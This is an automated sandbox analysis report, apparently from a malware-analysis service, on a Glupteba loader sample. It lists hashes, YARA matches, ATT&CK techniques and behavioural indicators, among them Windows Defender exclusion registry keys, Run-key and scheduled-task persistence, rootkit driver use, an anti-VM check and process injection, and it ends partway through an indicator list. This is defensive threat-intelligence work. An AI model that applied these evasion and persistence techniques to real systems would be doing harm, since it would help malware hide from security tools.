glupteba | 7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b

Analysis

max time kernel
299s
max time network
301s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
18-04-2024 22:48

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Size

4.2MB
MD5

6c1956eb2baee6fbd3c111b4c26cd490
SHA1

70f0c07eea58dbe10210da4a6dae0939ef9d7009
SHA256

7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b
SHA512

5573adade375b1ffb27d3550368167c6fe3d910f6186798dd5ba1c318371d1177df647bd1f06429c6bf1c29afaa275a7ab6a1eaa47f082d7d9e46e58c8f9a026
SSDEEP

98304:2CaftNj+u7KNRVHR2Q7UufYl81Mzh66Z5kbRiBHB9arql/z:+tBzONTNQxJkbRihjr

Score

10^/10

glupteba discovery dropper evasion loader persistence rootkit trojan upx

Malware Config

Signatures

Glupteba
Glupteba is a modular loader written in Golang with various components.
loader dropper glupteba

Glupteba payload 37 IoCs

Processes:

resource	yara_rule
behavioral2/memory/4684-2-0x0000000005150000-0x0000000005A3B000-memory.dmp	family_glupteba
behavioral2/memory/4684-3-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4684-300-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4684-302-0x0000000005150000-0x0000000005A3B000-memory.dmp	family_glupteba
behavioral2/memory/4064-304-0x0000000005120000-0x0000000005A0B000-memory.dmp	family_glupteba
behavioral2/memory/4064-307-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4064-798-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4064-1040-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1046-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1782-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1791-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1793-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1795-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1797-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1799-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1801-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1803-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1805-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1807-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1809-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1811-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1813-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1815-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1817-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1819-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1821-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1823-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1825-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1827-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1829-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1831-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1833-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1835-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1837-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1839-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1841-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba
behavioral2/memory/4192-1843-0x0000000000400000-0x000000000311B000-memory.dmp	family_glupteba

Windows security bypass 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

Modifies Windows Firewall 2 TTPs 1 IoCs
evasion

Windows Service
T1543.003

Disable or Modify System Firewall
T1562.004

Processes:

netsh.exe

pid process

4128 netsh.exe
Executes dropped EXE 5 IoCs

Processes:

csrss.exeinjector.exewindefender.exewindefender.exedcb505dc2b9d8aac05f4ca0727f5eadb.exe

pid process

4192 csrss.exe
428 injector.exe
716 windefender.exe
2664 windefender.exe
1848 dcb505dc2b9d8aac05f4ca0727f5eadb.exe

pid	process
4128	netsh.exe

pid	process
4192	csrss.exe
428	injector.exe
716	windefender.exe
2664	windefender.exe
1848	dcb505dc2b9d8aac05f4ca0727f5eadb.exe

UPX packed file 6 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

Processes:

resource	yara_rule
C:\Windows\windefender.exe	upx
behavioral2/memory/716-1790-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/2664-1792-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/2664-1796-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
behavioral2/memory/2664-1802-0x0000000000400000-0x00000000008DF000-memory.dmp	upx
C:\Users\Admin\AppData\Local\Temp\csrss\dcb505dc2b9d8aac05f4ca0727f5eadb.exe	upx

Windows security modification 2 TTPs 7 IoCs

evasion trojan

Disable or Modify Tools

T1562.001

Modify Registry

T1112

Processes:

7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

description	ioc	process
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\csrss.exe = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\windefender.exe = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Processes\7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\rss = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\csrss = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\windefender.exe = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Windows\System32\drivers = "0"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

Adds Run key to start application 2 TTPs 2 IoCs

persistence

Registry Run Keys / Startup Folder

T1547.001

Modify Registry

T1112

Processes:

csrss.exe7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

description	ioc	process
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	csrss.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-3968772205-1713802336-1776639840-1000\Software\Microsoft\Windows\CurrentVersion\Run\csrss = "\"C:\\Windows\\rss\\csrss.exe\""	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012
Manipulates WinMonFS driver. 1 IoCs
Roottkits write to WinMonFS to hide directories/files from being detected.
rootkit evasion

Processes:

csrss.exe

description ioc process

File opened for modification \??\WinMonFS csrss.exe

description	ioc	process
File opened for modification	\??\WinMonFS	csrss.exe

Drops file in System32 directory 8 IoCs

Processes:

powershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exe

description	ioc	process
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File created	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe
File opened for modification	C:\Windows\SysWOW64\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-Interactive	powershell.exe

Checks for VirtualBox DLLs, possible anti-VM trick 1 TTPs 1 IoCs
Certain files are specific to VirtualBox VMs and can be used to detect execution in a VM.

System Information Discovery
T1082

Processes:

7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

description ioc process

File opened (read-only) \??\VBoxMiniRdrDN 7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

description	ioc	process
File opened (read-only)	\??\VBoxMiniRdrDN	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

Drops file in Windows directory 4 IoCs

Processes:

csrss.exe7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

description	ioc	process
File created	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\windefender.exe	csrss.exe
File opened for modification	C:\Windows\rss	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
File created	C:\Windows\rss\csrss.exe	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe

Launches sc.exe 1 IoCs
Sc.exe is a Windows utlilty to control services on the system.

Processes:

sc.exe

pid process

3020 sc.exe
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exeschtasks.exe

pid process

4780 schtasks.exe
3148 schtasks.exe

pid	process
3020	sc.exe

pid	process
4780	schtasks.exe
3148	schtasks.exe

Modifies data under HKEY_USERS 64 IoCs

Processes:

powershell.exewindefender.exe7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exenetsh.exepowershell.exepowershell.exe

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-282 = "Central Europe Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-392 = "Arab Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2492 = "Aus Central W. Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1472 = "Magadan Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-1502 = "Turkey Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1821 = "Russia TZ 1 Daylight Time"	windefender.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\ProxyBypass = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-591 = "Malay Peninsula Daylight Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-434 = "Georgian Daylight Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-272 = "Greenwich Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-401 = "Arabic Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2611 = "Bougainville Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-462 = "Afghanistan Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-221 = "Alaskan Daylight Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-331 = "E. Europe Daylight Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2322 = "Sakhalin Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-241 = "Samoa Daylight Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-32 = "Mid-Atlantic Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2001 = "Cabo Verde Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\System\CurrentControlSet	netsh.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1801 = "Line Islands Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-365 = "Middle East Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-182 = "Mountain Standard Time (Mexico)"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2571 = "Turks and Caicos Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\IntranetName = "1"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-372 = "Jerusalem Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2432 = "Cuba Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-51 = "Greenland Daylight Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-251 = "Dateline Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2841 = "Saratov Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1862 = "Russia TZ 6 Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-161 = "Central Daylight Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-492 = "India Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (int)	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap\AutoDetect = "0"	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-105 = "Central Brazilian Standard Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-181 = "Mountain Daylight Time (Mexico)"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-72 = "Newfoundland Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-452 = "Caucasus Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-602 = "Taipei Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-1021 = "Bangladesh Daylight Time"	windefender.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-591 = "Malay Peninsula Daylight Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\@tzres.dll,-2792 = "Novosibirsk Standard Time"	windefender.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.exe
Set value (str)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\C:\Windows\system32\,@tzres.dll,-2142 = "Transbaikal Standard Time"	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exe7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exepowershell.exe7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exeinjector.execsrss.exe

pid	process
5088	powershell.exe
5088	powershell.exe
5088	powershell.exe
4684	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
4684	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
196	powershell.exe
196	powershell.exe
196	powershell.exe
4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
4064	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
1656	powershell.exe
1656	powershell.exe
1656	powershell.exe
4004	powershell.exe
4004	powershell.exe
4004	powershell.exe
4420	powershell.exe
4420	powershell.exe
4420	powershell.exe
4460	powershell.exe
4460	powershell.exe
4460	powershell.exe
2848	powershell.exe
2848	powershell.exe
2848	powershell.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
4192	csrss.exe
4192	csrss.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
4192	csrss.exe
4192	csrss.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
4192	csrss.exe
4192	csrss.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe
428	injector.exe

Suspicious use of AdjustPrivilegeToken 14 IoCs

Processes:

powershell.exe7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.exepowershell.execsrss.exesc.exepowershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5088	powershell.exe
Token: SeDebugPrivilege	4684	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Token: SeImpersonatePrivilege	4684	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe
Token: SeDebugPrivilege	196	powershell.exe
Token: SeDebugPrivilege	1656	powershell.exe
Token: SeDebugPrivilege	4004	powershell.exe
Token: SeDebugPrivilege	4420	powershell.exe
Token: SeDebugPrivilege	4460	powershell.exe
Token: SeDebugPrivilege	2848	powershell.exe
Token: SeSystemEnvironmentPrivilege	4192	csrss.exe
Token: SeSecurityPrivilege	3020	sc.exe
Token: SeSecurityPrivilege	3020	sc.exe
Token: SeDebugPrivilege	2888	powershell.exe
Token: SeDebugPrivilege	3612	powershell.exe

Suspicious use of WriteProcessMemory 45 IoCs

Processes:

7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.execmd.execsrss.exewindefender.execmd.exe

description	pid	process	target process
PID 4684 wrote to memory of 5088	4684	7a59ddefc2433806274b340af9cd19c6d119cedacfe6b5c498482c605f6a8a1b.exe	powershell.exe
